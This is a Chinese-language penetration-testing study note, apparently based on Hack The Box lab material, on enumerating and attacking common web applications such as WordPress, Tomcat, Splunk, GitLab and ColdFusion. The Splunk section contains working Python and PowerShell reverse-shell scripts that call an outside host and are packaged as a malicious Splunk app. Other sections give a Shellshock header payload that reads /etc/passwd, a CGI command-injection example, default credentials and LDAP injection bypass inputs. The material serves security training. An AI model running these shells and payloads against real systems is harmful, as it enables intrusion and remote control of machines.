渗透测试--攻击常见的Web应用

        本文章咱主要讨论，常见Web应用的攻击手法，其中并不完全，因为Web应用是在太多无法囊括全部，但其中的手法思想却值得我们借鉴，所以俺在此做了记录，希望对大家有帮助！主要有以下内容：

1.快速筛查Web应用

2.CMS类型Web应用案例

3.服务器类型Web应用案例

4.企业IT运维运营应用案例

5.企业客户端Web应用案例

6.网关接口应用案例

7.企业自定义客户端应用案例

8.企业IT开发平台应用案例

9.其他应用的漏洞应用

类别	应用
网站内容管理	Joomla、Drupal、WordPress、DotNetNuke 等。
应用服务器	Apache Tomcat、Phusion Passenger、Oracle WebLogic、IBM WebSphere 等。
安全信息和事件管理 (SIEM)	Splunk、Trustwave、LogRhythm 等
网管	PRTG网络监视器、ManageEngine Opmanger等
IT 管理	Nagios、Puppet、Zabbix、ManageEngine ServiceDesk Plus 等
软件框架	JBoss、Axis2 等
客户服务管理	osTicket、Zendesk 等
搜索引擎	Elasticsearch、Apache Solr 等
软件配置管理	Atlassian JIRA、GitHub、GitLab、Bugzilla、Bugsnag、Bitbucket 等。
软件开发工具	Jenkins、Atlassian Confluence、phpMyAdmin 等
企业应用集成	Oracle 融合中间件、BizTalk Server、Apache ActiveMQ 等

Application	Abuse Info
Axis2	This can be abused similar to Tomcat. We will often actually see it sitting on top of a Tomcat installation. If we cannot get RCE via Tomcat, it is worth checking for weak/default admin credentials on Axis2. We can then upload a webshell in the form of an AAR file (Axis2 service file). There is also a Metasploit module that can assist with this.
Websphere	Websphere has suffered from many different vulnerabilities over the years. Furthermore, if we can log in to the administrative console with default credentials such as system:manager we can deploy a WAR file (similar to Tomcat) and gain RCE via a web shell or reverse shell.
Elasticsearch	Elasticsearch has had its fair share of vulnerabilities as well. Though old, we have seen this before on forgotten Elasticsearch installs during an assessment for a large enterprise (and identified within 100s of pages of EyeWitness report output). Though not realistic, the Hack The Box machine Haystack features Elasticsearch.
Zabbix	Zabbix is an open-source system and network monitoring solution that has had quite a few vulnerabilities discovered such as SQL injection, authentication bypass, stored XSS, LDAP password disclosure, and remote code execution. Zabbix also has built-in functionality that can be abused to gain remote code execution. The HTB box Zipper showcases how to use the Zabbix API to gain RCE.
Nagios	Nagios is another system and network monitoring product. Nagios has had a wide variety of issues over the years, including remote code execution, root privilege escalation, SQL injection, code injection, and stored XSS. If you come across a Nagios instance, it is worth checking for the default credentials nagiosadmin:PASSW0RD and fingerprinting the version.
WebLogic	WebLogic is a Java EE application server. At the time of writing, it has 190 reported CVEs. There are many unauthenticated RCE exploits from 2007 up to 2021, many of which are Java Deserialization vulnerabilities.
Wikis/Intranets	We may come across internal Wikis (such as MediaWiki), custom intranet pages, SharePoint, etc. These are worth assessing for known vulnerabilities but also searching if there is a document repository. We have run into many intranet pages (both custom and SharePoint) that had a search functionality which led to discovering valid credentials.
DotNetNuke	DotNetNuke (DNN) is an open-source CMS written in C# that uses the .NET framework. It has had a few severe issues over time, such as authentication bypass, directory traversal, stored XSS, file upload bypass, and arbitrary file download.
vCenter	vCenter is often present in large organizations to manage multiple instances of ESXi. It is worth checking for weak credentials and vulnerabilities such as this Apache Struts 2 RCE that scanners like Nessus do not pick up. This unauthenticated OVA file upload vulnerability was disclosed in early 2021, and a PoC for CVE-2021-22005 was released during the development of this module. vCenter comes as both a Windows and a Linux appliance. If we get a shell on the Windows appliance, privilege escalation is relatively simple using JuicyPotato or similar. We have also seen vCenter already running as SYSTEM and even running as a domain admin! It can be a great foothold in the environment or be a single source of compromise.

快速筛查Web应用

 Nmap快速枚举应用数据源

#Nmap枚举网站并形成原始数据供Eyewitness或别的软件
nmap -p 80 --script http-enum --script-args http-enum.file=<path_to_your_dict> -oX output.xml <target>#Nmap枚举网站并形成xml数据源给Atonque
nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA discovery.web -iL list.target

Aquatone借助Nmap数据快速截图HTTP页面

#aquatone搭建HTTP截图页面
cat web_discovery.xml | ./aquatone -nmap

eyewitness借助Nmap数据快速截图HTTP页面

 eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness

CMS类型Web应用案例

 Wrodpress

#Robots.txt文件
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/Sitemap: https://inlanefreight.local/wp-sitemap.xml#网页中的敏感目录
wp-content/plugins
wp-content/themes#网页中搜索wordpress
curl -s http://blog.inlanefreight.local | grep WordPress
curl -s http://blog.inlanefreight.local | grep themes
curl -s http://blog.inlanefreight.local | grep plugins<meta name="generator" content="WordPress 5.8" /#相关库直接查看目录结构#dirsearch构建特殊字典#竟可能枚举插件和参数，我们会发现很多不同的东西

自动化扫描WordPress扫描工具

GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via contact@wpscan.com

攻击Wordpress

1.Wordpress存在大量插件库，存在大量漏洞。

Joomla

#robots.txt文件
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.htmlUser-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/#路径枚举
/README.txt
/administrator/manifests/files/joomla.xml
/plugins/system/cache/cache.xml

自动化扫描Joomla

GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.

GitHub - drego85/JoomlaScan: A free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.

攻击Joomla

1.joomla的插件库存在大量漏洞，可以优先扫描插件情况

Drupal

#发现drupal
curl -s http://drupal.inlanefreight.local | grep Drupal#扫描版本信息
curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""
curl -s http://drupal.inlanefreight.local/CHANGELOG.txt

自动化扫描Drupal

cmundy2@htb[/htb]$ droopescan scan drupal -u http://drupal.inlanefreight.local

攻击Drupal

1.攻击Drupal的插件

2.攻击Drupal的核心

服务器类型Web应用案例

 Tomcat

curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat #存在的路径
/manager/html
/docs/

tomcat的相关知识

#默认目录结构
├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
|   |       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work└── Catalina└── localhostwebapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF├── jsp|   └── admin.jsp└── web.xml└── lib|    └── jdbc_drivers.jar└── classes└── AdminServlet.class   #web.xml下的servlet结构
<web-app><servlet><servlet-name>AdminServlet</servlet-name><servlet-class>com.inlanefreight.api.AdminServlet</servlet-class></servlet><servlet-mapping><servlet-name>AdminServlet</servlet-name><url-pattern>/admin</url-pattern></servlet-mapping>
</web-app>   其中com.inlanefreight.api.AdminServlet意味着，该servlet的类在
classes/com/inlanefreight/api/AdminServlet.class#tomcat下的tomcat-users.xml里面会包含账号密码且控制manager页面的访问
<?xml version="1.0" encoding="UTF-8"?><SNIP><tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0">
<!--By default, no user is included in the "manager-gui" role requiredto operate the "/manager/html" web application.  If you wish to use this app,you must define such a user - the username and password are arbitrary.Built-in Tomcat manager roles:- manager-gui    - allows access to the HTML GUI and the status pages- manager-script - allows access to the HTTP API and the status pages- manager-jmx    - allows access to the JMX proxy and the status pages- manager-status - allows access to the status pages onlyThe users below are wrapped in a comment and are therefore ignored. If youwish to configure one or more of these users for use with the manager webapplication, do not forget to remove the <!.. ..> that surrounds them. Youwill also need to set the passwords to something appropriate.
--><SNIP>!-- user manager can access only manager section -->
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" /><!-- user admin can access manager and admin section both -->
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" /></tomcat-users>

攻击tomcat

1.tomcat服务器本身存在漏洞

2.获取管理员账号即可完成RCE，上传War包

jenkins

#图标
一个管家老头子

攻击jenkins

1.攻击jenkins本身

2.获取jenkins账号即可滥用/script功能完成RCE

 IIS服务器

枚举IIS服务器

IIS服务器和其他服务器有和其他服务器不一样的枚举方式，所以在此详述。

1.~可以帮助我们单个字母的枚举目录

###IIS服务器波浪号枚举短名称
http://example.com/~s
http://example.com/~se
http://example.com/~sec
...
http://example.com/~secret~1至此我们发现了/secret~1/目录，原理上来看其实和我们在linux上的tab类似，~1即tab后出现的第一个文件。借助这种信息，我们可以快速筛选我们的大字典以获取和前缀匹配的内容，从而快速爆破目录下的文件。自动化脚本工具https://github.com/irsdl/IIS-ShortName-Scanner

发现IIS服务器

1.nmap扫描，nc扫描查看响应包

企业IT运维运营应用案例

 Splunk

#nmap扫描配eyewitness可以直接发现#免费版是不需要密码的
https://10.129.201.50:8000/en-US/app/launcher/home

攻击Splunk

1.进入到Splunk后台，Splunk后台可以运行python脚本用于反连

2.Splunk服务器可以批量分发特定脚本给安装了Splunk universal forwarder的机器，也就是采集日志的机器。

Splunk后台功能滥用

###上传压缩包的结构，bin里面包含攻击脚本，default里面包含input.conf解析配置文件。
cmundy2@htb[/htb]$ tree splunk_shell/
splunk_shell/
├── bin
└── defaulttar -cvzf updater.tar.gz splunk_shell/
'''
splunk_shell/
splunk_shell/bin/
splunk_shell/bin/rev.py
splunk_shell/bin/run.bat
splunk_shell/bin/run.ps1
splunk_shell/default/
splunk_shell/default/inputs.conf
'''cmundy2@htb[/htb]$ cat inputs.conf
'''
[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell [script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
'''cat run.bat
'''
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
'''cat rev.py
'''
export RHOST="10.10.16.30";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
'''cat run.ps1
'''
$LHOST = "10.10.16.30"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
'''#压缩恶意文件
[!bash!]$ tar -cvzf updater.tar.gz splunk_shell/#上传它！
https://10.129.201.50:8000/en-US/manager/search/apps/local

 PRTG网络监视器

1.PRTG可能存在于任何端口，需要用eyewitness查看页面

2.PRTG存在漏洞，登录后台后可导致RCE

发现PRTG

攻击PRTG

###msf搞定msf可以搞定

                                                

企业客户端Web应用案例

 osTicket

发现osTicket

###cookie存在线索OSTSESSID###powered by osTicket存在页面中###页面中包含Support Ticket System

攻击osTicket

###LFI###SQLI###FileUpload###XSS###SSRF###工单系统中的各种交流也是我们关注的重点，比如服务器管理员和任何人之间的交流。

Gitlab

发现Gitlab

###登录页
http://gitlab.inlanefreight.local:8081/users/sign_in###gitlab版本页，需要登录，可以注册一个账户
http://gitlab.inlanefreight.local:8081/help###探索每个模块的help页面，以确认版本
我们可以探索左上角groups、snippets和 中链接的每个页面help###gitlab上可能存在的敏感信息
文章：https://tillsongalloway.com/finding-sensitive-information-on-github/index.html

攻击gitlab

###用户名枚举
msf###远程代码执行
msf

网关接口应用案例

 Tomcat CGI

发现tomcat cgi

###nmap扫描到tomcat后访问/cgi/目录
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd#可用扩展
.cmd
.bat

攻击cgi

###命令注入
/welcome.bat?&whoami###对于发现的cgi都可以使用shellshock攻击

shellshock攻击攻击cgi

Shellshock漏洞（Shellshock vulnerability） 是一个影响旧版本 Bash 的漏洞，攻击者可以利用这个漏洞在环境变量中注入恶意命令，进而执行操作系统命令。这个漏洞源于 Bash 错误地处理环境变量中的函数定义。当函数被作为环境变量传递时，Bash会错误地执行环境变量后面的命令。

漏洞示例及原理

假设我们有一个环境变量 y，其值是一个 Bash 函数定义和一条命令：

bash

复制代码

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

解释：

1. 函数定义：
   y='() { :;};' 这一部分定义了一个名为 y 的空函数。这个函数不做任何事情，只是返回退出代码 0（即什么也不做，正常退出）。

   在 Bash 中，函数定义是通过 () 括起来的。例如：y() { ... }。

2. 恶意命令：
   echo vulnerable-shellshock 是定义在环境变量中的恶意命令，应该在函数定义后执行。

3. 执行：
   bash -c "echo not vulnerable" 这部分命令会启动一个新的 Bash 子进程，并执行 echo not vulnerable。

漏洞发生的关键：

• 旧版本的 Bash 错误地将环境变量中的内容解析为一个函数定义，并继续执行定义后面的命令。
• 因为 y 被定义为一个空函数（() { :;};），但是函数后面紧跟着 echo vulnerable-shellshock，Bash 会错误地执行这个命令。

例子

#所有的头都是bash的环境变量，在cgi语境下，所以我们可以逐个尝试，原理上不可编码，因为bash不会采取编码，如要绕过可以采用base64绕过。
User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd

企业自定义客户端应用案例

 Thick Client Applications

        胖客户端其实就是一些类似于APP的应用程序，胖客户端在本地承担了很多逻辑和运行判断以减轻服务器的负担，所以我们可以通过逆向了解本地代码的很多逻辑从而找到漏洞或硬编码凭证。本部分仅引用了HacktheBox里面的部分内容，主要是介绍了可以使用的工具，因为逆向的精髓并不在此，且俺也不会逆向所以我也就不多讲了。感兴趣的可以去Login To HTB Academy & Continue Learning | HTB Academy

Information Gathering

In this step, penetration testers have to identify the application architecture, the programming languages and frameworks that have been used, and understand how the application and the infrastructure work. They should also need to identify technologies that are used on the client and server sides and find entry points and user inputs. Testers should also look for identifying common vulnerabilities like the ones we mentioned earlier at the end of the About section. The following tools will help us gather information.

CFF Explorer	Detect It Easy	Process Monitor	Strings

Client Side attacks

Although thick clients perform significant processing and data storage on the client side, they still communicate with servers for various tasks, such as data synchronization or accessing shared resources. This interaction with servers and other external systems can expose thick clients to vulnerabilities similar to those found in web applications, including command injection, weak access control, and SQL injection.

Sensitive information like usernames and passwords, tokens, or strings for communication with other services, might be stored in the application's local files. Hardcoded credentials and other sensitive information can also be found in the application's source code, thus Static Analysis is a necessary step while testing the application. Using the proper tools, we can reverse-engineer and examine .NET and Java applications including EXE, DLL, JAR, CLASS, WAR, and other file formats. Dynamic analysis should also be performed in this step, as thick client applications store sensitive information in the memory as well.

Ghidra	IDA	OllyDbg	Radare2
dnSpy	x64dbg	JADX	Frida

Network Side Attacks

If the application is communicating with a local or remote server, network traffic analysis will help us capture sensitive information that might be transferred through HTTP/HTTPS or TCP/UDP connection, and give us a better understanding of how that application is working. Penetration testers that are performing traffic analysis on thick client applications should be familiar with tools like:

Wireshark	tcpdump	TCPView	Burp Suite

exe场景

1.使用ProcessMonitor监控进程情况，注意注册表位置和创建文件位置。发现创建文件位置后，可以去创建的目录处修改用户权限，让文件不被删除。

2.使用ollydebug反编译程序，查看可以解密的内容，比如发现使用的什么语言，就有什么反编译器。

3.查看文件内的硬编码

4.有时候需要反编译DLL文件

实现手段

string64反编译DOS MZ executable内存块

If we double-click on it, we will see the magic bytes MZ in the ASCII column that indicates that the file is a DOS MZ executable.

Let's return to the Memory Map pane, then export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File. Running strings on the exported file reveals some interesting information.

  Attacking Thick Client Applications

C:\> C:\TOOLS\Strings\strings64.exe .\restart-service_00000000001E0000.bin<SNIP>
"#M
z\V
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName
.NET Framework 4 Client Profile
<SNIP>

Reading the output reveals that the dump contains a .NET executable. We can use De4Dot to reverse .NET executables back to the source code by dragging the restart-service_00000000001E0000.bin onto the de4dot executable.

de4dot清理.NET反编译文件

Reading the output reveals that the dump contains a .NET executable. We can use De4Dot to reverse .NET executables back to the source code by dragging the restart-service_00000000001E0000.bin onto the de4dot executable.

  Attacking Thick Client Applications

de4dot v3.1.41592.3405Detected Unknown Obfuscator (C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin)
Cleaning C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin
Renaming all obfuscated symbols
Saving C:\Users\cybervaca\Desktop\restart-service_00000000001E0000-cleaned.binPress any key to exit...

Now, we can read the source code of the exported application by dragging and dropping it onto the DnSpy executable.

With the source code disclosed, we can understand that this binary is a custom-made runas.exe with the sole purpose of restarting the Oracle service using hardcoded credentials.

dnSpy反编译DLL文件

使用调试器和 .NET 程序集编辑器dnSpy，我们可以直接查看源代码。此工具允许读取、编辑和调试 .NET 程序集（C# 和 Visual Basic）的源代码。检查MultimasterAPI.Controllers->ColleagueController会显示包含密码的数据库连接字符串。

jar场景

1.使用jd-gui完成java反编译，代码审计

实现手段

jd-gui保存反编译源码

The server filters out the / character from the input. Let's decompile the application using JD-GUI, by dragging and dropping the fatty-client-new.jar onto the jd-gui.

Save the source code by pressing the Save All Sources option in jdgui. Decompress the fatty-client-new.jar.src.zip by right-clicking and selecting Extract files. The file fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java handles the application features. Reading its content reveals the following code.

编译Java源码

        从jd-gui获取源码后我们可以对源码进行修改，修改完毕需要通过java文件生成class文件

C:\> javac -cp <编译环境> <要编译的java文件>
C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java

打包成jar文件

jar -cmf <MF文件路径> <生成的jar包名> .
jar -cmf META-INF\MANIFEST.MF traverse.jar .

 链接服务的应用程序

 dnSpy反编译DLL文件

使用调试器和 .NET 程序集编辑器dnSpy，我们可以直接查看源代码。此工具允许读取、编辑和调试 .NET 程序集（C# 和 Visual Basic）的源代码。检查MultimasterAPI.Controllers->ColleagueController会显示包含密码的数据库连接字符串。

gdb反编译ELF文件

###反编译ELF文件
gdb ./ELF###执行文件一次
gdb-peda$ run###设置编译语言并编译
gdb-peda$ set disassembly-flavor intel
gdb-peda$ disas main###设置断点
gdb-peda$ b *0x5555555551b0###再执行一次
gdb-peda$ run

企业IT开发平台应用案例

 ColdFusion

发现ColdFusion

1.端口

2.CFML语言

3.8500端口上的/CFIDE/、/cfdocs/

4.cfdocs中可查看版本信息

###端口
端口号	协议	描述
80	HTTP	用于 Web 服务器和 Web 浏览器之间的非安全 HTTP 通信。
443	HTTPS	用于 Web 服务器和 Web 浏览器之间的安全 HTTP 通信。加密 Web 服务器和 Web 浏览器之间的通信。
1935	RPC	用于客户端-服务器通信。远程过程调用 (RPC) 协议允许程序从不同网络设备上的另一个程序请求信息。
25	邮件传输协议	简单邮件传输协议 (SMTP) 用于发送电子邮件。
8500	SSL	用于通过安全套接字层 (SSL) 进行服务器通信。
5500	服务器监控	用于 ColdFusion 服务器的远程管理。###cfml语言范例
<cfquery name="myQuery" datasource="myDataSource">SELECT *FROM myTable
</cfquery>###特有目录
/CFIDE/
/cfdocs/
/CFIDE/administrator

攻击ColdFusion

1.searchsploit有RCE

2.searchsploit有目录遍历

其他应用的漏洞应用

LDAP

发现LDAP

1.389端口

攻击LDAP

LDAP需要详细了解其功能。俺目前并没有系统学习这部分，后续学习后会重新整理该部分，并更新文章，当前仅放入一些基本的概念信息，大家敬请期待。

LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory information. A directory is a hierarchical data store that contains information about network resources such as users, groups, computers, printers, and other devices. LDAP provides some excellent functionality:

Functionality	Description
Efficient	Efficient and fast queries and connections to directory services, thanks to its lean query language and non-normalised data storage.
Global naming model	Supports multiple independent directories with a global naming model that ensures unique entries.
Extensible and flexible	This helps to meet future and local requirements by allowing custom attributes and schemas.
Compatibility	It is compatible with many software products and platforms as it runs over TCP/IP and SSL directly, and it is platform-independent, suitable for use in heterogeneous environments with various operating systems.
Authentication	It provides authentication mechanisms that enable users to sign on once and access multiple resources on the server securely.

However, it also suffers some significant issues:

Functionality	Description
Compliance	Directory servers must be LDAP compliant for service to be deployed, which may limit the choice of vendors and products.
Complexity	Difficult to use and understand for many developers and administrators, who may not know how to configure LDAP clients correctly or use it securely.
Encryption	LDAP does not encrypt its traffic by default, which exposes sensitive data to potential eavesdropping and tampering. LDAPS (LDAP over SSL) or StartTLS must be used to enable encryption.
Injection	Vulnerable to LDAP injection attacks, where malicious users can manipulate LDAP queries and gain unauthorised access to data or resources. To prevent such attacks, input validation and output encoding must be implemented.

LDAP is commonly used for providing a central location for accessing and managing directory services. Directory services are collections of information about the organisation, its users, and assets–like usernames and passwords. LDAP enables organisations to store, manage, and secure this information in a standardised way. Here are some common use cases:

Use Case	Description
Authentication	LDAP can be used for central authentication, allowing users to have single login credentials across multiple applications and systems. This is one of the most common use cases for LDAP.
Authorisation	LDAP can manage permissions and access control for network resources such as folders or files on a network share. However, this may require additional configuration or integration with protocols like Kerberos.
Directory Services	LDAP provides a way to search, retrieve, and modify data stored in a directory, making it helpful for managing large numbers of users and devices in a corporate network. LDAP is based on the X.500 standard for directory services.
Synchronisation	LDAP can be used to keep data consistent across multiple systems by replicating changes made in one directory to another.

There are two popular implementations of LDAP: OpenLDAP, an open-source software widely used and supported, and Microsoft Active Directory, a Windows-based implementation that seamlessly integrates with other Microsoft products and services.

Although LDAP and AD are related, they serve different purposes. LDAP is a protocol that specifies the method of accessing and modifying directory services, whereas AD is a directory service that stores and manages user and computer data. While LDAP can communicate with AD and other directory services, it is not a directory service itself. AD offers extra functionalities such as policy administration, single sign-on, and integration with various Microsoft products.

LDAP	Active Directory (AD)
A protocol that defines how clients and servers communicate with each other to access and manipulate data stored in a directory service.	A directory server that uses LDAP as one of its protocols to provide authentication, authorisation, and other services for Windows-based networks.
An open and cross-platform protocol that can be used with different types of directory servers and applications.	Proprietary software that only works with Windows-based systems and requires additional components such as DNS (Domain Name System) and Kerberos for its functionality.
It has a flexible and extensible schema that allows custom attributes and object classes to be defined by administrators or developers.	It has a predefined schema that follows and extends the X.500 standard with additional object classes and attributes specific to Windows environments. Modifications should be made with caution and care.
Supports multiple authentication mechanisms such as simple bind, SASL, etc.	It supports Kerberos as its primary authentication mechanism but also supports NTLM (NT LAN Manager) and LDAP over SSL/TLS for backward compatibility.

LDAP works by using a client-server architecture. A client sends an LDAP request to a server, which searches the directory service and returns a response to the client. LDAP is a protocol that is simpler and more efficient than X.500, on which it is based. It uses a client-server model, where clients send requests to servers using LDAP messages encoded in ASN.1 (Abstract Syntax Notation One) and transmitted over TCP/IP (Transmission Control Protocol/Internet Protocol). The servers process the requests and send back responses using the same format. LDAP supports various requests, such as bind, unbind, search, compare, add, delete, modify, etc.

LDAP requests are messages that clients send to servers to perform operations on data stored in a directory service. An LDAP request is comprised of several components:

1. Session connection: The client connects to the server via an LDAP port (usually 389 or 636).
2. Request type: The client specifies the operation it wants to perform, such as bind, search, etc.
3. Request parameters: The client provides additional information for the request, such as the distinguished name (DN) of the entry to be accessed or modified, the scope and filter of the search query, the attributes and values to be added or changed, etc.
4. Request ID: The client assigns a unique identifier for each request to match it with the corresponding response from the server.

Once the server receives the request, it processes it and sends back a response message that includes several components:

1. Response type: The server indicates the operation that was performed in response to the request.
2. Result code: The server indicates whether or not the operation was successful and why.
3. Matched DN: If applicable, the server returns the DN of the closest existing entry that matches the request.
4. Referral: The server returns a URL of another server that may have more information about the request, if applicable.
5. Response data: The server returns any additional data related to the response, such as the attributes and values of an entry that was searched or modified.

After receiving and processing the response, the client disconnects from the LDAP port.

ldapsearch

For example, ldapsearch is a command-line utility used to search for information stored in a directory using the LDAP protocol. It is commonly used to query and retrieve data from an LDAP directory service.

  LDAP

cmundy2@htb[/htb]$ ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "(mail=john.doe@example.com)"

This command can be broken down as follows:

• Connect to the server ldap.example.com on port 389.
• Bind (authenticate) as cn=admin,dc=example,dc=com with password secret123.
• Search under the base DN ou=people,dc=example,dc=com.
• Use the filter (mail=john.doe@example.com) to find entries that have this email address.

The server would process the request and send back a response, which might look something like this:

Code: ldap

dn: uid=jdoe,ou=people,dc=example,dc=com
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
cn: John Doe
sn: Doe
uid: jdoe
mail: john.doe@example.comresult: 0 Success

This response includes the entry's distinguished name (DN) that matches the search criteria and its attributes and values.

---

LDAP Injection

LDAP injection is an attack that exploits web applications that use LDAP (Lightweight Directory Access Protocol) for authentication or storing user information. The attacker can inject malicious code or characters into LDAP queries to alter the application's behaviour, bypass security measures, and access sensitive data stored in the LDAP directory.

To test for LDAP injection, you can use input values that contain special characters or operators that can change the query's meaning:

Input	Description
*	An asterisk * can match any number of characters.
( )	Parentheses ( ) can group expressions.
|	A vertical bar | can perform logical OR.
&	An ampersand & can perform logical AND.
(cn=*)	Input values that try to bypass authentication or authorisation checks by injecting conditions that always evaluate to true can be used. For example, (cn=*) or (objectClass=*) can be used as input values for a username or password fields.

LDAP injection attacks are similar to SQL injection attacks but target the LDAP directory service instead of a database.

For example, suppose an application uses the following LDAP query to authenticate users:

Code: php

(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

In this query, $username and $password contain the user's login credentials. An attacker could inject the * character into the $username or $password field to modify the LDAP query and bypass authentication.

If an attacker injects the * character into the $username field, the LDAP query will match any user account with any password. This would allow the attacker to gain access to the application with any password, as shown below:

Code: php

$username = "*";
$password = "dummy";
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

Alternatively, if an attacker injects the * character into the $password field, the LDAP query would match any user account with any password that contains the injected string. This would allow the attacker to gain access to the application with any username, as shown below:

Code: php

$username = "dummy";
$password = "*";
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

LDAP injection attacks can lead to severe consequences, such as unauthorised access to sensitive information, elevated privileges, and even full control over the affected application or server. These attacks can also considerably impact data integrity and availability, as attackers may alter or remove data within the directory service, causing disruptions to applications and services dependent on that data.

To mitigate the risks associated with LDAP injection attacks, it is crucial to thoroughly validate and sanitize user input before incorporating it into LDAP queries. This process should involve removing LDAP-specific special characters like * and employing parameterised queries to ensure user input is treated solely as data, not executable code.